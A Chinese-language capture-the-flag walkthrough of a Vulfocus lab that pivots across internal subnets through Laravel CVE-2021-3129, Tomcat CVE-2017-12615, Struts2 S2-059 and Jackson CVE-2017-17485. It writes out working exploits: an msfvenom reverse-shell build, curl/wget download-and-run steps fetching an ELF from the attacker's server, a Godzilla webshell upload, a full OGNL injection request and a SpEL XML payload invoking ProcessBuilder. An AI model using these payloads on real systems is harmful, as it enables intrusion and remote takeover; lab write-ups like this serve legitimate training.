Vulfocus靶场-内网死角场景WP
匿名者 892天前
一、入口初探
版本信息:Laravel v8.41.0
漏洞CVE-2021-3129 远程代码执行
利用:
https://github.com/zhzyker/CVE-2021-3129[root@lyqzitm4zttepqpb-0724445 CVE-2021-3129]# python3 exp.py http://123.58.236.76:53681/
[*] Try to use Laravel/RCE1 for exploitation.
[+]exploit:
[*] Laravel/RCE1 Result:
[*] Try to use Laravel/RCE2 for exploitation.
[+]exploit:
[*] Laravel/RCE2 Result:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Try to use Laravel/RCE3 for exploitation.
[+]exploit:
[*] Laravel/RCE3 Result:
[*] Try to use Laravel/RCE4 for exploitation.
[+]exploit:
[*] Laravel/RCE4 Result:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Try to use Laravel/RCE5 for exploitation.
[+]exploit:
[*] Laravel/RCE5 Result:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Try to use Laravel/RCE6 for exploitation.
[+]exploit:
[*] Laravel/RCE6 Result:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Try to use Laravel/RCE7 for exploitation.
[+]exploit:
[*] Laravel/RCE7 Result:
[*] Try to use Monolog/RCE1 for exploitation.
[+]exploit:
[*] Monolog/RCE1 Result:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Try to use Monolog/RCE2 for exploitation.
[+]exploit:
[*] Monolog/RCE2 Result:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Try to use Monolog/RCE3 for exploitation.
[+]exploit:
[*] Monolog/RCE3 Result:
[*] Try to use Monolog/RCE4 for exploitation.
[+]exploit:
[*] Monolog/RCE4 Result:利用成功,可以看到很多点都成功执行了id命令,修改RCE2的命令为ls /tmp获取flag
显示的时候末尾少个}
接下来准备上线msf
msf生产linux后门
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxxx -f elf > xxxx.elf
配置msf linux/x86/meterpreter/reverse_tcp payload监听
在xxx.elf目录开启web服务用来下载
python3 -m http.server 8008
更改CVE-2021-3129/exp.py 多处
curl -O http://xxxxxx:8008/8091.elf
chmod 777 8091.elf
./8091.elf
成功上线
添加路由
发现两段内部网络
192.120.2.0/24(此网段是靶机与靶场连接的,没有目标)
192.120.4.0/24
二、漫游内网
使用use auxiliary/scanner/portscan/tcp模块探测192.120.4.0/24网段
发现192.120.4.2:8080
meterpreter > background
msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set rhosts 192.120.4.0/24
rhosts => 192.120.4.0/24
msf6 auxiliary(scanner/portscan/tcp) > set ports 22,23,80,443,8080,8081,3389,445,143,6379
ports => 22,23,80,443,8080,8081,3389,445,143,6379
msf6 auxiliary(scanner/portscan/tcp) > set threads 20
threads => 20
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.120.4.2: - 192.120.4.2:8080 - TCP OPEN
[+] 192.120.4.3: - 192.120.4.3:80 - TCP OPEN
[+] 192.120.4.1: - 192.120.4.1:80 - TCP OPEN
[*] 192.120.4.0/24: - Scanned 41 of 256 hosts (16% complete)
[*] 192.120.4.0/24: - Scanned 56 of 256 hosts (21% complete)
[*] 192.120.4.0/24: - Scanned 80 of 256 hosts (31% complete)
[*] 192.120.4.0/24: - Scanned 104 of 256 hosts (40% complete)
[*] 192.120.4.0/24: - Scanned 128 of 256 hosts (50% complete)
[*] 192.120.4.0/24: - Scanned 158 of 256 hosts (61% complete)
[*] 192.120.4.0/24: - Scanned 184 of 256 hosts (71% complete)
[*] 192.120.4.0/24: - Scanned 205 of 256 hosts (80% complete)
[*] 192.120.4.0/24: - Scanned 233 of 256 hosts (91% complete)
[*] 192.120.4.0/24: - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed使用use auxiliary/server/socks_proxy模块开启socks5代理,代理浏览器访问192.120.4.2:8080
使用SocksCap64代理cmd.exe,使用vulmap扫描192.120.4.2:8080
发现存在CVE-2017-12615
上传哥斯拉jsp木马
继续使用SocksCap64代理cmd.exe
curl -v -X PUT --data-binary @shell.jsp "http://192.120.4.2:8080/shell.jsp/"
哥斯拉代理,然后连接
拿到第二台机器的flag
查看ip发现192.120.1.0/24网段
上传MSF木马,上线MSF
添加192.120.1.0/24网段路由
扫描192.120.1.0/24网段,发现192.120.1.3:8080
浏览器访问
测试存在漏洞S2-059
需要用到burp进行发包
浏览器把流量发到burp,然后burp再把流量发到msf的socks
发送payload得到flag
POST /index.action HTTP/1.1
Host: 192.120.1.2:8080
Content-Length: 586
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.120.1.2:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.120.1.2:8080/index.action
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=EBD7FC6F70573BD03F46F8E43E2DBC91
Connection: close
skillName=%25%7b%23_memberAccess.allowPrivateAccess%3Dtrue%2C%23_memberAccess.allowStaticMethodAccess%3Dtrue%2C%23_memberAccess.excludedClasses%3D%23_memberAccess.acceptProperties%2C%23_memberAccess.excludedPackageNamePatterns%3D%23_memberAccess.acceptProperties%2C%23res%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D%40java.lang.Runtime%40getRuntime()%2C%23s%3Dnew%20java.util.Scanner(%23a.exec('ls%20%2Ftmp').getInputStream()).useDelimiter('%5C%5C%5C%5CA')%2C%23str%3D%23s.hasNext()%3F%23s.next()%3A''%2C%23res.print(%23str)%2C%23res.close()%0A%7d
上线msf,和之前一样
先wget下载elf文件
chmod给执行权限
再执行上线MSF
添加路由,扫描192.120.3.0/24网段
发现IP端口192.120.3.2:8080
三、CVE-2017-17485
经过尝试发现漏洞为CVE-2017-17485
创建spel.xml
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/xmlSchema-instance"
xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder">
<constructor-arg>
<array>
<value>wget</value>
<value>9135gi.dnslog.cn</value>
</array>
</constructor-arg>
<property name="any" value="#{ pb.start() }"/>
</bean>
</beans>python3 -m http.server 8087 python开启web8087,让其加载spel.xml
POST /exploit HTTP/1.1
Host: 192.120.3.2:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 143
{
"param": [
"org.springframework.context.support.FileSystemxmlApplicationContext",
"http://VPS-IP:8087/spel.xml"
]
}
上线MSF获取FLAG
python3 -m http.server 8088 8088为下载elf文件端口
上线拿到最后的flag
昵称
邮箱
最新评论